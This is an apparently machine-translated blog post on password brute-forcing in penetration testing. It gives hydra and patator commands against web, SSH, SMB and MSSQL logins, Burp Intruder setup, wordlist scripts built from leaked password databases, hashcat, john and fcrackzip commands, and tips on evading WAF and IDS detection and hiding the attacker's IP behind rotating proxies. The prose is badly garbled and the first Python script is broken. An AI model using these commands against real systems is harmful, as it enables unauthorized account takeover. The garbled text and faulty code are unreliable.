Hacking Book | Free Online Hacking Learning


password scanning and cracking techniques in penetration testing

Posted by chiappelli at 2020-02-27

0x00 the process of foreword test always involves "password" and "encryption and decryption". In the process of stampede, the attempt to weak password is an essential process, from XX catch chicken to intranet hash batch transfer, from personal PC to ⽹ network equipment / industrial control facilities, as long as the single factor mode password authentication is still used, Password scanning will not be forgotten. The following is a brief summary of the skills of password scanning and cracking in security testing. If there are omissions and mistakes, I hope you can give me some advice. 0x01 organize an excellent dictionary to crack the password, and we are required to have "someone else's password". The importance of the dictionary in the password scanning process is self-evident. Organize an excellent dictionary, You can refer to the leakage database of major websites, collect the password (clear text) field, and generate a dictionary according to the frequency of occurrence. A demo script:


Import sys

from collections import Counter

file = open(sys.argv[1], 'r')

readlist = []

count_times = []

for line in file.readlines():

line = line.strip('\r\n ')


sortlist = Counter(readlist).most_common()

for line in sortlist:

print line[0]

0x02 a satisfactory tool set needs to use its tools to do good things. In the password enumeration tool, the list of tools recommended by the author is as follows:

Of course, according to specific needs (such as adding various disguises to bypass detection), we may also need to write our own scripts to realize the process of enumerating accounts

0x03 there is WAF in the bypass detection web layer and IDS / IPS in the service, which is easy to be alarmed. Before the test, it is necessary to determine whether there is corresponding protection through scanning and other methods, and take corresponding measures. The web layer may have verification code, may have IP connection limit per second, and may determine whether the behavior is human or robot through Cookie / header and other information. After a series of tests (how to test or explore by yourself), Use the most reasonable way to bypass or avoid the step of blocking the enumeration account password caused by detection

0x04 enumeration of Web accounts

Common possibilities for bypassing validation:

In Web enumeration, all common problems can be basically solved by using burpseuite. The relevant documents of the tool are also rich. Open the agent, open intercept, log on the web page, enter the user password, block the data package, select send to introder, and enter the attack module

There are four modes:

Reference link: http://www.digininja.org/blog/burp'intruder'types.php after selecting the corresponding mode, set the payload to runtime file, mount the dictionary file, and cancel the payload encoding. If it is found that the user's local password will be calculated after MD5 is submitted, the process of MD5 calculation needs to be added to the payload processing

After setting, you can also add regular matching results and so on. After that, you can start attack

In this process, if you are worried about IP address exposure, you can choose to write a script: the script listens to a port locally, and randomly extracts the proxy IP for each enumeration. In burp, you can set the proxy to the port monitored by the local script. 0x05 HTTP basic authentication is often used for home routing / JBoss. During the authentication process, The user name and password are encrypted. If there is no correct user name and password, it will return

HTTP/1.1 401 Authorization Required

As you can see from the packet capture, the default user name is admin, and the default password is admin to log in the route. This is the case for many parts of the HTTP header

Authorization: Basic YWRtaW46YWRtaW4=

Base64 decryption is admin: admin. For basic authentication password decryption, it can still be used, but the user name and password need to be processed first. A demo script is as follows:




















import os.path,sys,base64

userfile = raw_input("input usr file:")

passfile = raw_input("input pwd file:")

outputfile = raw_input("input out file:")

outputfile = open(outputfile, "w")

userInfile = open(userfile)

passInfile = open(passfile)

userLines = userInfile.readlines()

passLines = passInfile.readlines()

for userLine in userLines:

for passLine in passLines:

combinedLine = userLine.strip() + ':' + passLine.strip()

print combinedLine

outputfile.write(base64.b64encode(combinedLine) + '\n')




After the dictionary is generated, it can be blasted with burp

Of course, Hydra offers a simpler solution

hydra -L user.txt -P pass.txt -F http://demourl:2048/auth

Where - L and - P uppercase are both mount dictionaries, - f means that the global will stop cracking once the legitimate user password is found, and - t parameter can also be added to specify the number of threads

0x06 the enumeration of service password cracking cannot be separated from services. For the enumeration of common services such as FTP / SSH / telnet / POP3 / 1433, the information is complete. The following is only a brief record of the command FTP

hydra -L user.txt -P pass.txt -F


hydra -L user.txt -P pass.txt -F ssh://

patator ssh_login host= user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'


hydra -L user.txt -P pass.txt -F smb://


hydra -L user.txt -P pass.txt -F mssql://

0x07 there are two possibilities for social workers' dictionary generation password collision: weak password represented by admin and social workers' password represented by * 19 × 0101. In case of failure of weak password attempt, if you have a full grasp of the target information, you can try to generate social workers' dictionary. Take cupp.py tool as an example to create a new dictionary:

After filling in the relevant information, generate a dictionary, and then use the above tools to continue enumeration; -) 0x08 hash cracking under win environment, WCE and other tools directly grab the memory password, and offline cracking after grasping hash is often inevitable, especially after Microsoft's recent vulnerability patches: (ordinary hash can be cracked with opcrack, and the official website provides the corresponding rainbow table download, of course, You can also query it directly. Http://www.objectif-security.ch/en/ophtrack.php if you have to, you need to crack other uncommon password hashes (which can't be solved with the help of existing web cracking services). For the time being, there are only three relatively efficient methods:

And if we can break the password according to the rules after certain rules of password. For example, if we create an account with a password of hahaharoot and use John brute force mode password, it is difficult for ordinary computers to run out in a day, but if we find that other passwords of the administrator, such as Web / SQL, start with hahaha, we can consider defining password rules, such as

hashcat -m1800 -a3 hashdumpedfile --pw-min=7 --pw-max=11 "hahaha?l?l?l?l"

In a few seconds, I got the password plaintext

Where - M specifies the hash algorithm and - A3 specifies the brute force cracking method. It can also be cracked by generating a password dictionary with a specified prefix through scripts and using tools to mount the dictionary

john -w:gen_wordlist.txt hash

0x09 the password of the file is finally supplemented with a bit of cracking. For zip files, the encryption method is not as strong as rar, so it is very likely to be decrypted. The command of cracking tool under a Kali is as follows:

fcrackzip -b -v -c a -l 1-4 -u 1.zip

Where, - B specifies brute force cracking, - V displays details, - C a specifies that the password is a pure letter, - L 1-4 specifies that the password length is 1-4 bits, - U indicates that the possible password is used for decompression test (plus, otherwise many interference passwords will appear)

As for the password cracking of other documents, if you have efficient tools, please share them

Reward distribution: the reward is 110RMB, which has been distributed to the author's account on May 28.

Solicitation notice: 91ri has always believed that "you don't share with others, who shares with you". Sharing is indeed a very meaningful thing. In order to let the excellent students have a place to share their original opinions, and also to let more students benefit from sharing, we also hope to give a little heartfelt thanks to those who are willing to share, so we solemnly launched the "prize essay collection" activity! The details of this activity can be seen in the notice for soliciting manuscripts